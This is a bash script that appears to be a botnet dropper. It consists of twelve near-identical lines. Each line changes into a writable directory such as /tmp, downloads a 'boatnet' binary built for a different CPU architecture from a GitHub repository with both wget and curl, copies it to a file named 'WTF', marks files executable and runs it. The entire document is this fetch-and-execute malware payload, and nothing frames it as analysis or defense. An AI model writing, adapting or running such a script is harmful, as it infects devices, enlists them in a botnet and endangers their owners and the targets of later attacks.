#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://github.com/testaccouynt/wrqerq121r/blob/main/var/www/html/hiddenbin/boatnet.x86; curl -O https://github.com/testaccouynt/wrqerq121r/blob/main/var/www/html/hiddenbin/boatnet.x86;cat boatnet.x86 >WTF;chmod +x *;./WTF
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://github.com/testaccouynt/wrqerq121r/blob/main/var/www/html/hiddenbin/boatnet.mips; curl -O https://github.com/testaccouynt/wrqerq121r/blob/main/var/www/html/hiddenbin/boatnet.mips;cat boatnet.mips >WTF;chmod +x *;./WTF
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://github.com/testaccouynt/wrqerq121r/blob/main/var/www/html/hiddenbin/boatnet.arc; curl -O https://github.com/testaccouynt/wrqerq121r/blob/main/var/www/html/hiddenbin/boatnet.arc;cat boatnet.arc >WTF;chmod +x *;./WTF
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://github.com/testaccouynt/wrqerq121r/blob/main/var/www/html/hiddenbin/boatnet.mpsl; curl -O https://github.com/testaccouynt/wrqerq121r/blob/main/var/www/html/hiddenbin/boatnet.mpsl;cat boatnet.mpsl >WTF;chmod +x *;./WTF
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://github.com/testaccouynt/wrqerq121r/blob/main/var/www/html/hiddenbin/boatnet.arm; curl -O https://github.com/testaccouynt/wrqerq121r/blob/main/var/www/html/hiddenbin/boatnet.arm;cat boatnet.arm >WTF;chmod +x *;./WTF
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://github.com/testaccouynt/wrqerq121r/blob/main/var/www/html/hiddenbin/boatnet.arm5; curl -O https://github.com/testaccouynt/wrqerq121r/blob/main/var/www/html/hiddenbin/boatnet.arm5;cat boatnet.arm5 >WTF;chmod +x *;./WTF
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://github.com/testaccouynt/wrqerq121r/blob/main/var/www/html/hiddenbin/boatnet.arm6; curl -O https://github.com/testaccouynt/wrqerq121r/blob/main/var/www/html/hiddenbin/boatnet.arm6;cat boatnet.arm6 >WTF;chmod +x *;./WTF
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://github.com/testaccouynt/wrqerq121r/blob/main/var/www/html/hiddenbin/boatnet.arm7; curl -O https://github.com/testaccouynt/wrqerq121r/blob/main/var/www/html/hiddenbin/boatnet.arm7;cat boatnet.arm7 >WTF;chmod +x *;./WTF
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://github.com/testaccouynt/wrqerq121r/blob/main/var/www/html/hiddenbin/boatnet.ppc; curl -O https://github.com/testaccouynt/wrqerq121r/blob/main/var/www/html/hiddenbin/boatnet.ppc;cat boatnet.ppc >WTF;chmod +x *;./WTF
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://github.com/testaccouynt/wrqerq121r/blob/main/var/www/html/hiddenbin/boatnet.spc; curl -O https://github.com/testaccouynt/wrqerq121r/blob/main/var/www/html/hiddenbin/boatnet.spc;cat boatnet.spc >WTF;chmod +x *;./WTF
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://github.com/testaccouynt/wrqerq121r/blob/main/var/www/html/hiddenbin/boatnet.m68k; curl -O https://github.com/testaccouynt/wrqerq121r/blob/main/var/www/html/hiddenbin/boatnet.m68k;cat boatnet.m68k >WTF;chmod +x *;./WTF
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://github.com/testaccouynt/wrqerq121r/blob/main/var/www/html/hiddenbin/boatnet.sh4; curl -O https://github.com/testaccouynt/wrqerq121r/blob/main/var/www/html/hiddenbin/boatnet.sh4;cat boatnet.sh4 >WTF;chmod +x *;./WTF
